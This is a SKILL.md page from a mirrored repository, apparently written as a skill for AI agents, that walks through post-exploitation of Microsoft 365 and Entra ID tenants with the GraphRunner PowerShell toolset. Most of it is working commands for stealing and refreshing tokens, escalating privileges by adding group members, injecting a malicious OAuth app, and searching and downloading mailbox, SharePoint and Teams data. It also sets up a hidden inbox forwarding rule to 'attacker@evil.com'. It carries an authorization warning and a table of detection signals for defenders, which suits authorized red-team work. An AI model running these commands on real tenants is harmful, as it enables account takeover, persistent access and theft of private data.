creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-26 19:54:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
768ca51c8d331ab0bdcea8ffb31c9b99bb2c1839
Anthropic-Cybersecurity-Skills/skills/post-exploiting-microsoft-graph-with-graphrunner/SKILL.md
T
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817) 
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00

9.8 KiB
Raw Blame History

name, description, domain, subdomain, tags, version, author, license, nist_csf, mitre_attack
name description domain subdomain tags version author license nist_csf mitre_attack
post-exploiting-microsoft-graph-with-graphrunner Perform recon, persistence, privilege escalation, and data search via the Microsoft Graph API using GraphRunner. cybersecurity identity-access-management
red-team
microsoft-graph
graphrunner
entra-id
oauth-abuse
account-manipulation
post-exploitation
m365
1.0 mahipal Apache-2.0
PR.AA-05
T1098

Post-Exploiting Microsoft Graph with GraphRunner

Authorized use only: GraphRunner performs offensive actions against live Microsoft 365 / Entra ID tenants — deploying OAuth apps, cloning groups, adding members, and reading mailboxes, SharePoint, and Teams. Run it only against tenants you own or are explicitly authorized in writing to test. Unauthorized use is illegal.

Overview

GraphRunner (Beau Bullock / Black Hills Information Security) is a PowerShell post-exploitation toolset built entirely on the Microsoft Graph API. Given a foothold token, it performs recon, establishes persistence, escalates privilege, and pillages M365 data — all through Graph, which blends in with normal traffic and bypasses many endpoint controls. It is the natural follow-on to credential/token theft (e.g., device-code phishing or ROADtools): once you hold Graph access, GraphRunner operationalizes it.

The toolset is a single PowerShell module (GraphRunner.ps1) exposing dozens of functions grouped by purpose:

  • AuthenticationGet-GraphTokens (device-code login), Invoke-RefreshGraphTokens, Invoke-AutoTokenRefresh, Invoke-ImportTokens, Invoke-RefreshToSharePointToken.
  • Recon & EnumerationInvoke-GraphRecon (tenant/user permission summary), Invoke-DumpCAPS (conditional-access policies), Invoke-DumpApps (app registrations / consent grants), Get-AzureADUsers, Get-SecurityGroups, Get-UpdatableGroups, Get-DynamicGroups, Invoke-SearchUserAttributes, Invoke-GraphOpenInboxFinder, Find-PermissiveCalendars.
  • PersistenceInvoke-InjectOAuthApp (deploy a malicious OAuth app for consent-grant persistence), Invoke-CreateInboxForwardingRule.
  • Privilege EscalationGet-UpdatableGroups, Invoke-AddGroupMember, Invoke-SecurityGroupCloner, Invoke-InviteGuest.
  • Pillage / Data SearchInvoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, Invoke-SearchTeams, Get-TeamsChat, Invoke-DriveFileDownload.
  • Master runnerInvoke-GraphRunner runs an automated recon-and-pillage pass; List-GraphRunnerModules prints all modules.

This maps to MITRE ATT&CK T1098 — Account Manipulation: GraphRunner manipulates accounts, groups, and OAuth grants (adding members, injecting apps, cloning groups, inviting guests) to maintain and escalate access in the cloud identity plane.

When to Use

  • After obtaining a valid Microsoft Graph access/refresh token during an authorized M365/Entra engagement.
  • When mapping tenant permissions, conditional-access policies, and OAuth app exposure.
  • When establishing cloud persistence via OAuth consent grants or inbox forwarding (in scope).
  • When demonstrating privilege escalation through updatable/dynamic groups.
  • When searching mailboxes, SharePoint/OneDrive, and Teams for sensitive data to evidence impact.

Prerequisites

  • Written authorization and scope for the target tenant.
  • A Graph token foothold (from Get-GraphTokens device-code login, or imported tokens).
  • PowerShell 5.1+ or PowerShell 7 (cross-platform).
# Clone and import the module
git clone https://github.com/dafthack/GraphRunner.git
cd GraphRunner
Import-Module .\GraphRunner.ps1

# List every available module
List-GraphRunnerModules

Objectives

  • Authenticate to Microsoft Graph and maintain tokens via refresh.
  • Enumerate tenant users, groups, CA policies, and OAuth apps.
  • Identify updatable groups and demonstrate privilege escalation.
  • Establish persistence via an injected OAuth app and/or inbox forwarding rule.
  • Search mailboxes, SharePoint/OneDrive, and Teams for sensitive content.

MITRE ATT&CK Mapping

ID Tactic Official Technique Name Role in this skill
T1098 Persistence Account Manipulation Add group members, clone groups, invite guests to retain/escalate access
T1098.003 Privilege Escalation Account Manipulation: Additional Cloud Roles Adding members to privileged/updatable groups
T1528 Credential Access Steal Application Access Token Get-GraphTokens device-code token acquisition
T1087.004 Discovery Account Discovery: Cloud Account Get-AzureADUsers, Invoke-SearchUserAttributes
T1114.002 Collection Email Collection: Remote Email Collection Invoke-SearchMailbox over Graph
T1606.002 Credential Access Forge Web Credentials: SAML/OAuth Invoke-InjectOAuthApp consent-grant persistence

Workflow

Step 1: Authenticate and refresh tokens

# Device-code login; complete the code at microsoft.com/devicelogin
Get-GraphTokens

# Refresh the access token when it expires
Invoke-RefreshGraphTokens

# Keep tokens fresh automatically during a long operation
Invoke-AutoTokenRefresh

# Import tokens captured elsewhere (e.g., from ROADtools)
Invoke-ImportTokens -AccessToken $at -RefreshToken $rt

Step 2: Recon and enumeration

# High-level tenant + current-user permission recon
Invoke-GraphRecon -Tokens $tokens -PermissionEnum

# Dump conditional-access policies
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids

# Enumerate app registrations, service principals, and consent grants
Invoke-DumpApps -Tokens $tokens

# Enumerate all users and security groups
Get-AzureADUsers -Tokens $tokens -OutFile users.txt
Get-SecurityGroups -Tokens $tokens

Step 3: Search user attributes for secrets

# Hunt across all user attributes for terms like "password"
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

Step 4: Privilege escalation via updatable groups

# Find groups the current principal can modify directly
Get-UpdatableGroups -Tokens $tokens

# Add yourself (or a controlled account) to a target group
Invoke-AddGroupMember -Tokens $tokens -GroupId <group-guid> -UserId <user-guid>

# Clone a privileged security group's membership into a new group you control
Invoke-SecurityGroupCloner -Tokens $tokens

Step 5: Persistence

# Deploy a malicious OAuth app and walk the consent-grant flow for persistence
Invoke-InjectOAuthApp -AppName "Demo App" -ReplyUrl "https://localhost" -Scope "openid profile offline_access Mail.Read"

# Create a hidden inbox forwarding rule on a target mailbox
Invoke-CreateInboxForwardingRule -Tokens $tokens -ForwardTo "attacker@evil.com" -RuleName "Sync"

Step 6: Pillage M365 data

# Search a mailbox (or all reachable mailboxes) for sensitive terms
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 100 -OutFile mail.csv

# Search SharePoint and OneDrive content
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "secret"

# Download a discovered file
Invoke-DriveFileDownload -Tokens $tokens -DriveItemIDs "<drive-id>:<item-id>" -FileName loot.docx

# Search Teams messages
Invoke-SearchTeams -Tokens $tokens -SearchTerm "vpn"

Step 7: Automated full pass

# Run the orchestrated recon + pillage workflow end to end
Invoke-GraphRunner -Tokens $tokens

Tools and Resources

Tool Purpose Primary Source
GraphRunner (repo) PowerShell Graph post-exploitation toolset https://github.com/dafthack/GraphRunner
GraphRunner wiki Per-module usage guide https://github.com/dafthack/GraphRunner/wiki
BHIS GraphRunner blog Tool release + walkthrough https://www.blackhillsinfosec.com/introducing-graphrunner/
Microsoft Graph API API reference for the underlying calls https://learn.microsoft.com/graph/api/overview
ROADtools Upstream token acquisition / device-code phishing https://github.com/dirkjanm/ROADtools

OPSEC and Detection Considerations

GraphRunner is designed to blend with legitimate Graph traffic, but its actions leave a trail defenders can hunt:

GraphRunner action Telemetry source What the defender sees
Get-GraphTokens (device code) Entra sign-in logs Device-code grant from the Azure CLI client (04b07795-...) on an unusual device/IP
Invoke-InjectOAuthApp Entra audit logs "Add application" + "Consent to application" events with broad delegated scopes
Invoke-AddGroupMember / Invoke-SecurityGroupCloner Entra audit logs "Add member to group" on privileged/role-assignable groups
Invoke-CreateInboxForwardingRule M365 audit + mailbox rules New inbox rule forwarding externally (often hidden)
Invoke-SearchMailbox / Invoke-SearchSharePointAndOneDrive MicrosoftGraphActivityLogs High-volume $search calls against /messages and Drive endpoints

To reduce noise during an authorized engagement, scope searches with -MessageCount, avoid role-assignable group changes unless required, and always remove injected apps with Invoke-DeleteOAuthApp and forwarding rules during cleanup.

Validation Criteria

  • Graph tokens obtained via Get-GraphTokens and refreshed successfully.
  • Tenant recon completed (Invoke-GraphRecon, Invoke-DumpCAPS, Invoke-DumpApps).
  • Users and security groups enumerated.
  • User attributes searched for embedded secrets.
  • Updatable groups identified and a controlled privilege escalation demonstrated.
  • Persistence established (OAuth app injection and/or inbox forwarding) where in scope.
  • Mailbox, SharePoint/OneDrive, and Teams searched for sensitive data.
  • All actions, object IDs, and evidence logged for the engagement report and cleanup.
Reference in New Issue View Git Blame Copy Permalink